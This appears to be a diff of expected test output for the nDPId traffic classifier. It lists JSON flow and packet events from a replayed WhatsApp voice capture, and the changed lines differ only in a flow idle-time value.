-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455688704,"flow_last_seen":1561455688704,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1561455688704,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.53","src_port":49355,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1561455688704,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1561455688704,"pkt":"xiwDYGpkkLkxKPrKCABFAABAAABAAEAGxd7AqAIMnfAUNcDLFGab0QrZAAAAALDC\/\/8eGAAAAgQFtAEDAwYBAQgKNM3yoAAAAAAEAgAA"} 
-00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1561455688744,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1561455688744,"pkt":"kLkxKPrKxiwDYGpkCABFAAA8AAAAAFMG8uKd8BQ1wKgCDBRmwMsu6BkVm9EK2qASbHAbGAAAAgQFeAQCCAoefUIDNM3yoAEDAwg="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1561455688841,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1561455688841,"pkt":"xiwDYGpkkLkxKPrKCABFAAA0AABAAEAGxerAqAIMnfAUNcDLFGab0QraLugZFoAQCAytcgAAAQEICjTN8zsefUID"} -00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":43,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1561455688704,"flow_last_seen":1561455689390,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":7769,"flow_avg_l4_payload_len":242,"midstream":0,"thread_ts_msec":1561455689390,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.53","src_port":49355,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
-00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1561455688704,"flow_last_seen":1561455689390,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":7769,"flow_avg_l4_payload_len":242,"midstream":0,"thread_ts_msec":1561455689390,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.53","src_port":49355,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455688704,"flow_last_seen":1561455688704,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1561455688704,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.53","src_port":49355,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1561455688704,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1561455688704,"pkt":"xiwDYGpkkLkxKPrKCABFAABAAABAAEAGxd7AqAIMnfAUNcDLFGab0QrZAAAAALDC\/\/8eGAAAAgQFtAEDAwYBAQgKNM3yoAAAAAAEAgAA"} 
+00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1561455688744,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1561455688744,"pkt":"kLkxKPrKxiwDYGpkCABFAAA8AAAAAFMG8uKd8BQ1wKgCDBRmwMsu6BkVm9EK2qASbHAbGAAAAgQFeAQCCAoefUIDNM3yoAEDAwg="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1561455688841,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1561455688841,"pkt":"xiwDYGpkkLkxKPrKCABFAAA0AABAAEAGxerAqAIMnfAUNcDLFGab0QraLugZFoAQCAytcgAAAQEICjTN8zsefUID"} +00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":43,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1561455688704,"flow_last_seen":1561455689390,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":7769,"flow_avg_l4_payload_len":242,"midstream":0,"thread_ts_msec":1561455689390,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.53","src_port":49355,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
+00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1561455688704,"flow_last_seen":1561455689390,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":7769,"flow_avg_l4_payload_len":242,"midstream":0,"thread_ts_msec":1561455689390,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.53","src_port":49355,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":60,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455689728,"flow_last_seen":1561455689728,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1561455689728,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":55296,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1561455689728,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1561455689728,"pkt":"xiwDYGpkkLkxKPrKCABFAABL058AAP8RYqTAqAIMwKgCAdgAADUAN5FDM2kBAAABAAAAAAAADG1lZGlhLW14cDEtMQNjZG4Id2hhdHNhcHADbmV0AAABAAE="} 
00795{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455689728,"flow_last_seen":1561455689728,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1561455689728,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":55296,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"dns": {"query":"media-mxp1-1.cdn.whatsapp.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00519{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1561455689761,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1561455689761,"pkt":"kLkxKPrKxiwDYGpkCABFAABbphoAAEARTxrAqAIBwKgCDAA12AAAR3hsM2mBgAABAAEAAAAADG1lZGlhLW14cDEtMQNjZG4Id2hhdHNhcHADbmV0AAABAAHADAABAAEAAABFAAQfDVYz"} 00808{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":61,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1561455689728,"flow_last_seen":1561455689761,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1561455689761,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":55296,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"dns": 
{"query":"media-mxp1-1.cdn.whatsapp.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"31.13.86.51"}} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":64,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455689909,"flow_last_seen":1561455689909,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1561455689909,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"31.13.86.51","src_port":50503,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1561455689909,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1561455689909,"pkt":"xiwDYGpkkLkxKPrKCABFAABAAABAAEAGAsTAqAIMHw1WM8VHAbtOnG1kAAAAALDC\/\/9BlgAAAgQFtAEDAwcBAQgKNM4E3wAAAAAEAgAA"} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1561455689928,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1561455689928,"pkt":"kLkxKPrKxiwDYGpkCABFAAA8AAAAAFQGLsgfDVYzwKgCDAG7xUfuAwj8TpxtZaASbHDC9wAAAgQFeAQCCAqHqaVzNM4E3wEDAwg="} 
-00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1561455690036,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1561455690036,"pkt":"xiwDYGpkkLkxKPrKCABFAAA0AABAAEAGAtDAqAIMHw1WM8VHAbtOnG1l7gMI\/YAQBAZZdQAAAQEICjTOBV2HqaVz"} -00965{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":67,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1561455689909,"flow_last_seen":1561455690039,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1561455690039,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"31.13.86.51","src_port":50503,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"tls": {"version":"TLSv1.2","client_requested_server_name":"media-mxp1-1.cdn.whatsapp.net","ja3":"b92a79ed03c3ff5611abb2305370d3e3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-01012{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":69,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1561455689909,"flow_last_seen":1561455690058,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1561455690058,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"31.13.86.51","src_port":50503,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"tls": {"version":"TLSv1.3","client_requested_server_name":"media-mxp1-1.cdn.whatsapp.net","ja3":"b92a79ed03c3ff5611abb2305370d3e3","ja3s":"475c9302dc42b2751db9edcac3b74891","unsafe_cipher":0,"cipher":"TLS_CHACHA20_POLY1305_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":64,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455689909,"flow_last_seen":1561455689909,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1561455689909,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"31.13.86.51","src_port":50503,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1561455689909,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1561455689909,"pkt":"xiwDYGpkkLkxKPrKCABFAABAAABAAEAGAsTAqAIMHw1WM8VHAbtOnG1kAAAAALDC\/\/9BlgAAAgQFtAEDAwcBAQgKNM4E3wAAAAAEAgAA"} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1561455689928,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1561455689928,"pkt":"kLkxKPrKxiwDYGpkCABFAAA8AAAAAFQGLsgfDVYzwKgCDAG7xUfuAwj8TpxtZaASbHDC9wAAAgQFeAQCCAqHqaVzNM4E3wEDAwg="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1561455690036,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1561455690036,"pkt":"xiwDYGpkkLkxKPrKCABFAAA0AABAAEAGAtDAqAIMHw1WM8VHAbtOnG1l7gMI\/YAQBAZZdQAAAQEICjTOBV2HqaVz"} 
+00965{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":67,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1561455689909,"flow_last_seen":1561455690039,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1561455690039,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"31.13.86.51","src_port":50503,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"tls": {"version":"TLSv1.2","client_requested_server_name":"media-mxp1-1.cdn.whatsapp.net","ja3":"b92a79ed03c3ff5611abb2305370d3e3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01012{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":69,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1561455689909,"flow_last_seen":1561455690058,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1561455690058,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"31.13.86.51","src_port":50503,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsAppFiles","breed":"Acceptable","category":"Download"},"tls": {"version":"TLSv1.3","client_requested_server_name":"media-mxp1-1.cdn.whatsapp.net","ja3":"b92a79ed03c3ff5611abb2305370d3e3","ja3s":"475c9302dc42b2751db9edcac3b74891","unsafe_cipher":0,"cipher":"TLS_CHACHA20_POLY1305_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":181,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455701309,"flow_last_seen":1561455701309,"flow_idle_time":180000,"flow_min_l4_payload_len":341,"flow_max_l4_payload_len":341,"flow_tot_l4_payload_len":341,"flow_avg_l4_payload_len":341,"midstream":0,"thread_ts_msec":1561455701309,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00902{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":181,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1561455701309,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":383,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":383,"pkt_l4_len":349,"thread_ts_msec":1561455701309,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAAFxXcMAAEARlWjAqAIBwKgC\/0RcRFwBXbU+eyJ2ZXJzaW9uIjogWzIsIDBdLCAicG9ydCI6IDE3NTAwLCAiaG9zdF9pbnQiOiAxNzQ1NjcxOTM5MjIwMTQ2OTg4Njg4NzAzNTEyMjAyNTg3OTI0NDMsICJkaXNwbGF5bmFtZSI6ICIiLCAibmFtZXNwYWNlcyI6IFsyNzUwMzcwNTYwLCA3ODUyNjYxNzcsIDE1MjYyNjMwNDUsIDEzMzg2NTkyMDEsIDE0ODE5MzM3LCA0ODA5NDIwMDQ4LCA1MTE3MDY2NDIsIDczNjM0MTUyOCwgOTM4ODEzODQ5LCAxMjY3Njk1MTA5LCA1NDQwNDA3MDcyLCA0ODEwNTkxNzYwLCA1ODM0NDk5NiwgOTk2MzA2MjE1LCA1MzAzMzAxMjQ4LCAzMDc1NTIxNjk2LCA0MDU2NDYyNTkyLCAyOTYzNjgyMDk2LCAxNTIyMTc3NTg3XX0="} 
00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":181,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455701309,"flow_last_seen":1561455701309,"flow_idle_time":180000,"flow_min_l4_payload_len":341,"flow_max_l4_payload_len":341,"flow_tot_l4_payload_len":341,"flow_avg_l4_payload_len":341,"midstream":0,"thread_ts_msec":1561455701309,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00899{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":182,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1561455701310,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":381,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":381,"pkt_l4_len":347,"thread_ts_msec":1561455701310,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAAFvHu4AAEAR1D\/AqAIBwKgC\/0RcRFwBW7HJeyJ2ZXJzaW9uIjogWzIsIDBdLCAicG9ydCI6IDE3NTAwLCAiaG9zdF9pbnQiOiAxNzQ1NjcxOTM5MjIwMTQ2OTg4Njg4NzAzNTEyMjAyNTg3OTI0NDMsICJkaXNwbGF5bmFtZSI6ICIiLCAibmFtZXNwYWNlcyI6IFsxMTgyMzk1NTczLCAxNDIxMTE0Mzk5LCAxODA4MDQ3NjgwLCAxMzcyMDkyNjA5LCAxMjUyMTE2NDI5LCA5OTQ2OTc3MywgNTI1ODAwNzEyMCwgMTc2OTY0MzA3LCAxMjU1NDA1NjYsIDEwNDc0MjgxODksIDQ3MTYxOTAwNDgsIDU0NjcxNjMwODgsIDExOTUwNDQwNzEsIDk2ODUzMjI0LCAxNzYwOTk2MywgNDUxNDcyNjU4LCA0MTc0NjUwODgwLCAyODUyMTYwNywgMTQxNTYyMDM1MF19"} 
-00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":186,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455702980,"flow_last_seen":1561455702980,"flow_idle_time":7440000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1561455702980,"l3_proto":"ip4","src_ip":"17.171.47.85","dst_ip":"192.168.2.12","src_port":443,"dst_port":50502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":186,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1561455702980,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1561455702980,"pkt":"kLkxKPrKxiwDYGpkCABFAgBT1H4AAC8Gs3ARqy9VwKgCDAG7xUbop23K2+r6qYAYAEJmGwAAAQEICipMBbM0zcKkFQMDABo0yWx0nf4Y8Lruj7Xpo7KOiHQ6o5fprSXAlA=="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":187,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1561455702981,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1561455702981,"pkt":"kLkxKPrKxiwDYGpkCABFAAA01H8AAC8Gs5ARqy9VwKgCDAG7xUbop23p2+r6qYARAEJXLQAAAQEICipMBbM0zcKk"} 
-00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":189,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1561455703144,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1561455703144,"pkt":"xiwDYGpkkLkxKPrKCABFAgBTAABAAEAGNu\/AqAIMEasvVcVGAbvb6vqp6KdtyoAYBACmYwAAAQEICjTOOFoqS5CDFQMDABoAAAAAAAAAAyfFNdvhqDfXGuNhDL9lpNkkKA=="} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":186,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455702980,"flow_last_seen":1561455702980,"flow_idle_time":7560000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1561455702980,"l3_proto":"ip4","src_ip":"17.171.47.85","dst_ip":"192.168.2.12","src_port":443,"dst_port":50502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":186,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1561455702980,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1561455702980,"pkt":"kLkxKPrKxiwDYGpkCABFAgBT1H4AAC8Gs3ARqy9VwKgCDAG7xUbop23K2+r6qYAYAEJmGwAAAQEICipMBbM0zcKkFQMDABo0yWx0nf4Y8Lruj7Xpo7KOiHQ6o5fprSXAlA=="} 
